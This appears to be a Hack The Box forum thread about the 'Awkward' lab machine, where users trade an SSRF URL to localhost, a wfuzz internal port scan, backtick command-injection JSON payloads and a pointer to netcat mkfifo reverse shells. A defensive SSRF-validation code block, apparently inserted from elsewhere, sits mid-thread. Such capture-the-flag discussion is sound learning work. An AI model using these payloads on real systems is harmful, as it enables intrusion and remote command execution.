Awkward - HTB [Discussion]
There's a store-status api endpoint that takes params:

import axios from 'axios'
axios.defaults.withCredentials = true
const baseURL = "/api/"
// The url param is serialised through toJSON, so it reaches the server as a JSON string literal
const store_status = (URL) => {
  const params = { url: { toJSON: () => URL } }
  return axios.get(baseURL + 'store-status', { params })
    .then(response => response.data)
}
export default { store_status }

maybe deadend tho
Reply
connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg
Reply
(October 22, 2022, 09:23 PM)wexaley273 Wrote: There is an SSRF that leaks source code http://hat-valley.htb/api/store-status?url=%22http://localhost:3002/%22
Need to abuse the Exec function and bypass filters


May I ask how you found port 3002?

Reply
(October 22, 2022, 09:41 PM)11231123 Wrote:
(October 22, 2022, 09:23 PM)wexaley273 Wrote: There is an SSRF that leaks source code http://hat-valley.htb/api/store-status?url=%22http://localhost:3002/%22
Need to abuse the Exec function and bypass filters


May I ask how you found port 3002?

wfuzz -c -z range,1-65535 --hh 0 -b "token=<COOKIE>" 'http://hat-valley.htb/api/store-status?url="http://localhost:FUZZ/"' 
only port 80,3002,8080 are open from localhost
Reply
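The store-status endpoint quoted at the top of the thread forwards whatever URL the client supplies, which is why a localhost URL reaches the internal port. As an added example (not code from the box or from anyone in the thread), this is the kind of server-side check that would stop it: the raw query value is unwrapped if it arrives as a JSON string literal (the client above serialises it through toJSON), parsed as a URL, and refused unless it uses https, carries no credentials or explicit port, and names an allowlisted upstream host that is not a loopback or private address. The host name store.example.com, the handler shape and the fetchFn argument are assumptions for illustration.

```javascript
// Added example: allowlist validation for a proxied "store-status" URL parameter.
// Not the box's code; the upstream host and handler shape are assumed.
const ALLOWED_HOSTS = new Set(['store.example.com']);   // assumed upstream store host
const ALLOWED_PROTOCOLS = new Set(['https:']);

// Refuse loopback, link-local, unique-local and RFC 1918 literals outright,
// even if one of them were ever added to the allowlist by mistake.
function isInternalHost(hostname) {
  const h = hostname.replace(/^\[|\]$/g, '').toLowerCase();   // WHATWG URL keeps [] on IPv6
  if (h === 'localhost' || h.endsWith('.localhost')) return true;
  if (h.includes(':')) {                                       // IPv6 literal
    return h === '::1' || h.startsWith('fe80:') || /^f[cd]/.test(h);
  }
  const m = h.match(/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/);
  if (!m) return false;                                        // a name, not an IPv4 literal
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 127 || a === 10 || a === 0 || (a === 169 && b === 254) ||
         (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// The client serialises the param via toJSON, so the raw query value may be
// a JSON string literal such as "\"http://localhost:3002/\"". Unwrap it first.
function normaliseParam(raw) {
  if (typeof raw !== 'string') return null;
  if (raw.startsWith('"')) {
    try {
      const v = JSON.parse(raw);
      return typeof v === 'string' ? v : null;
    } catch {
      return null;
    }
  }
  return raw;
}

// Returns the validated URL string, or null when the request must be refused.
function validateStoreUrl(raw) {
  const s = normaliseParam(raw);
  if (s === null) return null;
  let u;
  try {
    u = new URL(s);
  } catch {
    return null;                                   // not an absolute URL
  }
  if (!ALLOWED_PROTOCOLS.has(u.protocol)) return null;
  if (u.username || u.password) return null;      // no embedded credentials
  if (u.port !== '') return null;                  // default port only
  if (isInternalHost(u.hostname)) return null;
  if (!ALLOWED_HOSTS.has(u.hostname)) return null; // exact host match, no suffix tricks
  return u.toString();
}

// Express-style handler shape (assumed). fetchFn is only ever called with a
// URL that passed validation, so the server never contacts localhost on a
// client's behalf.
function storeStatusHandler(query, fetchFn) {
  const target = validateStoreUrl(query.url);
  if (target === null) return { status: 400, body: { error: 'url not permitted' } };
  return { status: 200, body: fetchFn(target) };
}

module.exports = { validateStoreUrl, storeStatusHandler, isInternalHost };
```

A hostname allowlist does not by itself defeat DNS rebinding; if the upstream host is under someone else's control, resolve it once, check the resolved address with the same internal-range test, and connect to that address. The simplest fix of all is to drop the parameter entirely and hard-code the upstream URL on the server, which is what an endpoint with a single legitimate target should do.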
(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg


{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(
Reply
(October 22, 2022, 09:45 PM)pingu27 Wrote:
(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg


{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

{"reason":"{{{7*7}}`whoami`","start":"21/10/2022","end":"05/11/2022"}
This works :)
Reply
(October 22, 2022, 09:45 PM)pingu27 Wrote:
(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg


{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(


only one, `[COMMAND]`
Reply
(October 22, 2022, 09:55 PM)GreyEVO Wrote:
(October 22, 2022, 09:45 PM)pingu27 Wrote:
(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg


{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(


only one, `[COMMAND]`

why does the backtick work and why does it give us bash command access. I thought since this is a node.js server, it would be js commands, which is what I have been trying.

nc mkfifo on revshells works well to get a callback tho
Reply
(October 22, 2022, 10:02 PM)sam123 Wrote:
(October 22, 2022, 09:55 PM)GreyEVO Wrote:
(October 22, 2022, 09:45 PM)pingu27 Wrote:
(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg


{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(


only one, `[COMMAND]`

why does the backtick work and why does it give us bash command access. I thought since this is a node.js server, it would be js commands, which is what I have been trying.

nc mkfifo on revshells works well to get a callback tho


cuz whatever you type in is processed server-side by /bin/sh in crontab to add to a csv file
Reply
(October 22, 2022, 09:54 PM)u53r Wrote:
(October 22, 2022, 09:45 PM)pingu27 Wrote:
(October 22, 2022, 09:34 PM)GreyEVO Wrote: connect as chris jones on the /hr/, then blind command injection in request leave to revshell, inject backticks then your command and gg


{"reason":"``whoami``","start":"23/10/2022","end":"01/01/2021"}

:(

{"reason":"{{{7*7}}`whoami`","start":"21/10/2022","end":"05/11/2022"}
This works :)

GG
Reply